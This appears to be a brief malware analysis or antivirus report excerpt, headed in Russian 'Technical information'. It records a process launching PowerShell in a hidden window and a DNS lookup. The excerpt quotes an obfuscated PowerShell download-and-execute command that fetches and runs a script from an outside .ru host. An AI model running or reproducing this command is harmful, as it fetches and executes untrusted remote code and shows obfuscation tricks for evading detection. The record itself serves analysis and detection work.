Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://securewedreesdsa.ru/hsjheje.txt')"
- DNS ASK se####wedreesdsa.ru
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://securewedreesdsa.ru/hsjheje.txt')"' (со скрытым окном)